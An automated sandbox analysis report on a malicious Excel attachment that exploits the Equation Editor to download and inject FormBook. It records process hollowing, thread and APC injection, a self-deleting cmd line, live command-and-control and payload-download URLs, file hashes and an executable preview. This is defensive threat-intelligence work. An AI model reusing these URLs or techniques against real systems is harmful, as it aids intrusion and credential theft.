Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388
Source: C:\Windows\SysWOW64\netsh.exe	Thread register set: target process: 1388

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Show sources

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: C00000

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'

Source: explorer.exe, 00000008.00000000.2160929155.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000000.2160929155.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000000.2185246191.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000008.00000000.2160929155.00000000006F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection612	Masquerading111	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Disable or Modify Tools11	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol122	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Information Discovery113	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing2	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Extra Window Memory Injection1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
oustanding 03082921.xlsx	26%	ReversingLabs	Document-OLE.Exploit.CVE-2018-0802

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dun[1].exe	100%	Joe Sandbox ML
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
7.2.vbc.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
micheldrake.com	0%	Virustotal		Browse
adultpeace.com	7%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
www.adultpeace.com/p2io/	0%	URL Reputation	safe
http://www.iotcloud.technology/p2io/?dzuD7VXH=L/l9chWXgd4NYCGd+vVro19pFM6JqqsPd4ppl3EKhtG9qh305X+esnK5qs3e0XUjSiRqvg==&bzr8U=6lxL-0XX	0%	Avira URL Cloud	safe
http://www.ruhexuangou.com/p2io/?dzuD7VXH=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&bzr8U=6lxL-0XX	0%	Avira URL Cloud	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://www.cleanxcare.com/p2io/?dzuD7VXH=pxlxKDNxRow4YEfruB4Bv4ohCC0AYWvU81HhH938ZriMjSGbLHz+dxzd3d03S+kNJyuCfQ==&bzr8U=6lxL-0XX	0%	Avira URL Cloud	safe
http://13.229.216.142/www/dun.exe	0%	Avira URL Cloud	safe
http://www.micheldrake.com/p2io/?dzuD7VXH=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&bzr8U=6lxL-0XX	0%	Avira URL Cloud	safe
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.%s.com	0%	URL Reputation	safe
http://www.adultpeace.com/p2io/?dzuD7VXH=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&bzr8U=6lxL-0XX	0%	Avira URL Cloud	safe
http://computername/printers/printername/.printer	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
micheldrake.com	192.0.78.25	true	true	0%, Virustotal, Browse	unknown
adultpeace.com	163.44.239.73	true	true	7%, Virustotal, Browse	unknown
iotcloud.technology	34.102.136.180	true	false		unknown
www.ruhexuangou.com	23.82.57.32	true	true		unknown
cleanxcare.com	78.31.67.91	true	true		unknown
www.trendbold.com	64.190.62.111	true	false		unknown
www.iotcloud.technology	unknown	unknown	true		unknown
www.cleanxcare.com	unknown	unknown	true		unknown
www.micheldrake.com	unknown	unknown	true		unknown
www.adultpeace.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.adultpeace.com/p2io/	true	URL Reputation: safe	low
http://www.iotcloud.technology/p2io/?dzuD7VXH=L/l9chWXgd4NYCGd+vVro19pFM6JqqsPd4ppl3EKhtG9qh305X+esnK5qs3e0XUjSiRqvg==&bzr8U=6lxL-0XX	false	Avira URL Cloud: safe	unknown
http://www.ruhexuangou.com/p2io/?dzuD7VXH=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&bzr8U=6lxL-0XX	true	Avira URL Cloud: safe	unknown
http://www.cleanxcare.com/p2io/?dzuD7VXH=pxlxKDNxRow4YEfruB4Bv4ohCC0AYWvU81HhH938ZriMjSGbLHz+dxzd3d03S+kNJyuCfQ==&bzr8U=6lxL-0XX	true	Avira URL Cloud: safe	unknown
http://13.229.216.142/www/dun.exe	true	Avira URL Cloud: safe	unknown
http://www.micheldrake.com/p2io/?dzuD7VXH=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&bzr8U=6lxL-0XX	true	Avira URL Cloud: safe	unknown
http://www.adultpeace.com/p2io/?dzuD7VXH=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&bzr8U=6lxL-0XX	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	explorer.exe, 00000008.00000000.2167152019.0000000003C40000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	explorer.exe, 00000008.00000000.2161066027.0000000001C70000.00000002.00000001.sdmp	false		high
http://wellformedweb.org/CommentAPI/	explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000008.00000000.2178764759.000000000861C000.00000004.00000001.sdmp	false		high
http://www.iis.fhg.de/audioPA	explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.%s.com	explorer.exe, 00000008.00000000.2182647228.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe	low
http://www.piriform.com/ccleaner	explorer.exe, 00000008.00000000.2166928921.00000000039F4000.00000004.00000001.sdmp	false		high
http://computername/printers/printername/.printer	explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.%s.comPA	explorer.exe, 00000008.00000000.2161066027.0000000001C70000.00000002.00000001.sdmp	false	URL Reputation: safe	low
http://%s.com	explorer.exe, 00000008.00000000.2182647228.000000000A330000.00000008.00000001.sdmp	false	URL Reputation: safe	low
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	explorer.exe, 00000008.00000000.2169101352.0000000003E27000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://treyresearch.net	explorer.exe, 00000008.00000000.2170747344.0000000004B50000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000008.00000000.2182647228.000000000A330000.00000008.00000001.sdmp	false		high
http://servername/isapibackend.dll	explorer.exe, 00000008.00000000.2171247047.0000000004F30000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
192.0.78.25	micheldrake.com	United States	2635	AUTOMATTICUS	true
23.82.57.32	www.ruhexuangou.com	United States	7203	LEASEWEB-USA-SFO-12US	true
13.229.216.142	unknown	United States	16509	AMAZON-02US	true
34.102.136.180	iotcloud.technology	United States	15169	GOOGLEUS	false
163.44.239.73	adultpeace.com	Japan	7506	INTERQGMOInternetIncJP	true
78.31.67.91	cleanxcare.com	Germany	24961	MYLOC-ASIPBackboneofmyLocmanagedITAGDE	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458692
Start date:	03.08.2021
Start time:	16:49:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 11s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	oustanding 03082921.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@9/19@6/6
EGA Information:	Failed
HDC Information:	Successful, ratio: 18% (good quality ratio 17.5%) Quality average: 76.9% Quality standard deviation: 24.9%
HCA Information:	Successful, ratio: 99% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, conhost.exe, svchost.exe TCP Packets have been reduced to 100 Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:50:05	API Interceptor	83x Sleep call for process: EQNEDT32.EXE modified
16:50:09	API Interceptor	58x Sleep call for process: vbc.exe modified
16:50:33	API Interceptor	592x Sleep call for process: netsh.exe modified
16:51:20	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
192.0.78.25	New PO 0006770.exe	Get hash	malicious	Browse	www.shiveringcactus.net/cre4/?PtxdIRyH=7+hRd8m1vP97o5DubQyJa7OS+X2NiXrCwgnyTwU2qt1qd4obqhWDAvBuarWxQP6NRJIW&tVPL=8pttg
	ORDER -ASLF1SR00116-PDF.doc	Get hash	malicious	Browse	www.albamauto.net/b8eu/?ezr8A=70TsRgR2vUTwaBZBaIavO5cZmOIei0NEheN8ZSTfcNJaDqQ7hsLW55bL6mIsi1Qo/+DTOw==&9rXX=a0DtZFt
	nWVjpM9ao5s78s3.exe	Get hash	malicious	Browse	www.thefucktardmanual.com/weni/?w4td4X=paTIa7wk6wENei2ifBtyV89J84XPfxhm99Ukyv3bGQklY2IVNxmyjS3YzcO8hytrgcmp&-ZTL=DZVXL4MhaFsdF
	N#U00e9cessaire personnalis#U00e9.exe	Get hash	malicious	Browse	www.howecute.gifts/e7hf/?y6=f9iM9c+3fsP4RzZFYpl+3m3jTMcm1z0vQ5bFkmHpRCcswREfHpJ40b65D9ChYAA0vqVp&ixlp=4hJDHbfx9N0lF6fp
	sq9aBtcak6.exe	Get hash	malicious	Browse	www.melitalifestyle.com/bsk9/?r48tRDj0=54ZFvPxix3ktm0cof+J2zOdW7Drcn2iwvFiMnSZhOqqJdIgo1b2RYB3bBYI2w3lKQHLO&e6tp=r2Jx
	8944848MNBV.exe	Get hash	malicious	Browse	www.sheri-stewart-voice-over.com/ogia/?_8OtFv=8TV6FPYnvQiOBKXToCmDt2AOB2x0UyAIphRqfmjd0jCzeb+fSahEWUX5bXQxu5Pdxb2G&3fx=n48x_Zmp-
	PO=#PLL-Order - Order CP01JN02-07-21 - Xls.exe	Get hash	malicious	Browse	www.the-lost-company.com/cvrn/?q6A=dWH9krMwNTg04d9qCA2as0dJ3G0u4FDCkzoR2m1sSNPkmjVxvRUVijkaaUGHVOCA+Fn+&a0DX=8pstIRupspshhL
	9qFR0r9nR9.exe	Get hash	malicious	Browse	www.micheldrake.com/p2io/?c48dX8=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZbge4LhevE&r6tLM=ktxh2
	Shipping Document DHL.exe	Get hash	malicious	Browse	www.bloodygoodbooks.com/0mq2/?z2J=P2JtLnr8&2d0LJl=ZDsTl6S9jIVij7pvgK4MoNWTWRqVGUkydkvX+MXwzdBUm4Dqeo1fEAUfiB+CDMsKfsHR
	SOA May-June 2021.exe	Get hash	malicious	Browse	www.soshecanned.com/u8u4/?q48l=cHWP6NwLv/aT6+rO/ebGv42NKIWnoFLhxJXNwGdVTw9RrQ1g4V3BIMmImBGJRa9G4IJL&hBZ=-ZcTFHRHlRdPjZE
	PO NEW ORDER 002001123.exe	Get hash	malicious	Browse	www.bloodygoodbooks.com/0mq2/?4h_hvt=ZDsTl6S9jIVij7pvgK4MoNWTWRqVGUkydkvX+MXwzdBUm4Dqeo1fEAUfiB+CDMsKfsHR&c4=IDKtp8tH
	heoN5wnP2d.exe	Get hash	malicious	Browse	www.micheldrake.com/p2io/?9rT0=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZx/uILlcnE&l2M=0pZ4_
	New Order_PO 1164_HD-F 4020 6K.exe	Get hash	malicious	Browse	www.realisticallywritten.com/rnn4/?wTq8ft=GmGX+ZuUQKrJllFD61Nj3aDXZ2KnBcnPv870Qyh2TrQK74Ogs2MlXpAd7lGq2Q4qlDRf&-Zl8=9r6Tk4x8G
	June 21st,2021.exe	Get hash	malicious	Browse	www.montrosecbdsupplements.com/cb53/?2dsl=kWKLgmICLD6qL4jsOwiLv5cNl5cQawIygHjde5nt6Iv0ICD1QOnvzbH8xTqcBePo3D7i&p48=SBZ0
	Swift_Report.exe	Get hash	malicious	Browse	www.viviangee.net/m3rc/?m6W4u=Rplm9Zqm1bsTCiQ8zCYp9ODm03Tc7pnEYFm3lAJXwDtX36/iYM/09//KWT8Pit56oDfG&gJBPYB=4huxslfxL6VH_
	swift_copy.exe	Get hash	malicious	Browse	www.unapersonaestabien.com/m3rc/?oL3=o7izuhN0eiDBtRVTd1lDz6WKoPkNEuauPIN5CezYSPQXzsgO8JvVj8I3N35hvRYKS8My&i4YLl6=6lmTNHW8
	New Order Vung Ang TPP Viet Nam.exe	Get hash	malicious	Browse	www.mykiwidesign.com/un8c/?m6=shtUrfI/xlBO8C2aliNZenIpYotasWnDtIq4lctURnres2cu8VpZnDv2KEk7PBf6bd7Gagapdg==&z8b=iZspkzE0JnS86
	qXDtb88hht.exe	Get hash	malicious	Browse	www.micheldrake.com/p2io/?b0GDi6=Q6Ahtfox&Z8E=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZx/uILlcnE
	Shipping Draft Doc.exe	Get hash	malicious	Browse	www.thelincmagazine.com/ajsp/?m2MXt=/vrJb/ib8JfDuP59hXmvirF0PbOJ5jAEPdt7hu8U8hUnFkZgeiMJfBrSsCKdAi+q3QiQ&g6bX=7nfxC0PhW
	Request for Courtesy Call - Urgent.xlsx	Get hash	malicious	Browse	www.micheldrake.com/p2io/?NFNpHvU=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==&Bv-=b8utZ

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LEASEWEB-USA-SFO-12US	New PO 0006770.exe	Get hash	malicious	Browse	23.81.39.143
	DHL Shipment Notification,PDF.exe	Get hash	malicious	Browse	172.255.209.118
	4A7rphFZrY	Get hash	malicious	Browse	142.91.25.66
	ORDER 200VPS.xlsx	Get hash	malicious	Browse	23.82.57.32
	heoN5wnP2d.exe	Get hash	malicious	Browse	23.82.57.32
	ZSu9Xi5VWW.exe	Get hash	malicious	Browse	23.82.57.32
	SKM_4050210326102400 jpg.exe	Get hash	malicious	Browse	23.108.182.213
	J1Dud83xTM.exe	Get hash	malicious	Browse	23.82.57.32
	DNPr7t0GMY.exe	Get hash	malicious	Browse	23.82.57.32
	lTAPQJikGw.exe	Get hash	malicious	Browse	147.255.162.204
	FORM C1.xlsx	Get hash	malicious	Browse	147.255.162.204
	qXDtb88hht.exe	Get hash	malicious	Browse	23.82.57.32
	6dTTv9IdCw.exe	Get hash	malicious	Browse	147.255.162.204
	wMKDi0Ss3f.exe	Get hash	malicious	Browse	23.82.57.32
	ENrFQVzLHE.exe	Get hash	malicious	Browse	147.255.162.204
	Request For Courtesy Call 7710090112332.xlsx	Get hash	malicious	Browse	23.82.57.32
	xhbUdeAoVP.exe	Get hash	malicious	Browse	147.255.162.204
	bin.exe	Get hash	malicious	Browse	23.82.57.32
	b02c0831_by_Libranalysis.exe	Get hash	malicious	Browse	23.82.57.32
	Contract MAY2021.xlsx	Get hash	malicious	Browse	147.255.162.204
AUTOMATTICUS	UEe8hqOnX7fBM9G.exe	Get hash	malicious	Browse	192.0.78.24
	CyLELjM5zk.exe	Get hash	malicious	Browse	74.114.154.18
	New PO 0006770.exe	Get hash	malicious	Browse	192.0.78.25
	setup_x86_x64_install.exe	Get hash	malicious	Browse	74.114.154.18
	85d8c.exe	Get hash	malicious	Browse	74.114.154.22
	85d8c.exe	Get hash	malicious	Browse	74.114.154.22
	AR2rPMLtaN.exe	Get hash	malicious	Browse	74.114.154.22
	flJrVwWebP.exe	Get hash	malicious	Browse	74.114.154.22
	QfVER41Fwx.exe	Get hash	malicious	Browse	74.114.154.22
	O3h9kRdG7d.exe	Get hash	malicious	Browse	74.114.154.22
	1A263B2603212FF1E492D9E0C718F12601789E27EAABA.exe	Get hash	malicious	Browse	74.114.154.22
	mbVrdKm3zX.exe	Get hash	malicious	Browse	74.114.154.22
	Dpjv8G9gX5.exe	Get hash	malicious	Browse	74.114.154.18
	5qW61eKDTp.exe	Get hash	malicious	Browse	74.114.154.18
	WWzUml7m53.exe	Get hash	malicious	Browse	74.114.154.22
	e7V79qGVJT.exe	Get hash	malicious	Browse	74.114.154.18
	4Dm89IWqe9.exe	Get hash	malicious	Browse	74.114.154.18
	YoKh9rD5xR.exe	Get hash	malicious	Browse	74.114.154.22
	Oyu6AMjXZH.exe	Get hash	malicious	Browse	74.114.154.18
	IsVEKYHPfW.exe	Get hash	malicious	Browse	74.114.154.22

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dun[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	1336832
Entropy (8bit):	7.015277955515814
Encrypted:	false
SSDEEP:	24576:JvvbQF4jajOm9u+d7bs6IpQf4DMqMuulZcjLsq3ut:FbQOmi0Zbwp3DlFu
MD5:	214B1DDF045E4D6FDD73A5C8788D2ADC
SHA1:	8BB7C462FB649D16EDB98AB526DF8475A329CC71
SHA-256:	D8E25CE44C46057985A0467ADCF4FC12D8BEAC599E3031F6674FD1E01988267E
SHA-512:	781FFF07EDCB65EC4C77C80F20A6C6AA658F4679C411654ABCDC1233F19CEA170B47EBB5A4227618459482F32462AF12188A7CB870BD3EB347696485BB530E3C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	http://13.229.216.142/www/dun.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L.a..............P..p.............. ........@.. ....................................@.................................x...O.................................................................................... ............... ..H............text....o... ...p.................. ..`.rsrc................r..............@..@.reloc...............d..............@..B........................H.......L...d8......M....................................................(....&..(......s.........s ........s!........s"........s#...........0...........~....o$....+...0...........~....o%....+...0...........~....o&....+...0...........~....o'....+...0...........~....o(....+...0..<........~.....().....,!r...p.....(...o+...s,............~.....+...0...........~.....+.."........0..&........(....r%..p~....o-...(......t$....+..Vs....(/...t...........(0...*.0..........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D6C62CF.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\214A5B32.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
